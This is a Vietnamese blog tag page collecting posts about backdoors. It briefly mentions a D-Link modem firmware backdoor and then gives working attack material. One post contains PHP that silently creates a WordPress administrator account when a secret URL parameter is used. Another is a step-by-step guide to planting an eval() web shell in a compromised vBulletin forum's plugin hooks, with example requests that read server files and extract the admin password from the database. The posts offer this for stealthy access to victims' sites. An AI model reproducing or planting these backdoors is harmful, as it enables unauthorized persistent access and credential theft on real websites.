Hiển thị các bài đăng có nhãn BackDoor. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn BackDoor. Hiển thị tất cả bài đăng

Backdoor trong modem D-Link và khai thác

Một người bạn đã đưa cho tôi bài viết này.

Backdoor trong modem D-Link và khai thác với chrome

reverse engineering đối với firmware của modem D-Link và phát hiện trong đó có một cách có thể để bất cứ người nào truy cập trực tiếp vào modem D-Link.

Rõ ràng đây là dụng ý của nhà sản xuất firmware…Đoạn code có dạng:


Mã:

Xem Thêm

 

WordPress Admin Access Backdoor


<?php 
add_action('wp_head', 'my_backdoor'); 

function my_backdoor() { 
If ($_GET['backdoor'] == 'go') { 
require('wp-includes/registration.php'); 
If (!username_exists('private')) { 
$user_id = wp_create_user('private', '12345678'); 
$user = new WP_User($user_id); 
$user->set_role('administrator'); 
} 
} 
} 
?>

Xem Thêm

 

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
Okê, chỉ cần 1 dòng đơn giản:

eval($_REQUEST['dct']);
Đầu tiên bạn cần truy cập vào: Plugin & product manager => Plugin manager => Tìm đến 1 plugin bất kì => EDIT => chèn dòng trên vào vị trí hợp lý (Nếu không hiểu lắm về cấu trúc php thì bạn có thể chèn vào đầu hoặc cuối)
Bạn cần chú ý vào “HOOK” mà bạn chèn. Bạn nào hiểu phần này thì okê rồi. Còn nếu bạn nào chưa hiểu thì hãy chọn những kái nào có hook là:
ajax_start => Sau khi chèn chỉ việc truy cập /forum_path/ajax.php?dct=(Code php)
global_start (ko biết có nhớ lộn ko) => Sau khi chèn chỉ việc truy cập /forum_path/forum.php?dct=(Code php) — (Hoặc có thể run bất kì file php nào, vì chèn vào global mà)
……………..Blah blah……………..
Code php bạn có thể chèn truy vấn SQL, readfile….
Ví dụ
?dct=$duyk=readfile(‘includes/class_core.php’); echo $duyk; => view file class_core.php
?dct=$duyk=mysql_fetch_array(mysql_query(“select password from user where userid=1″)); echo $duyk['password'];
……………..
Demo:


Với việc chèn “Cửa hậu” nhỏ gọn như vậy nhưng rất hiệu quả :D Bằng cách này chúng ta có 1 cửa cho riêng mình để vào “nhà” của victim 1 cách lén lút nhất
Nguồn: DaiCa.info


Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương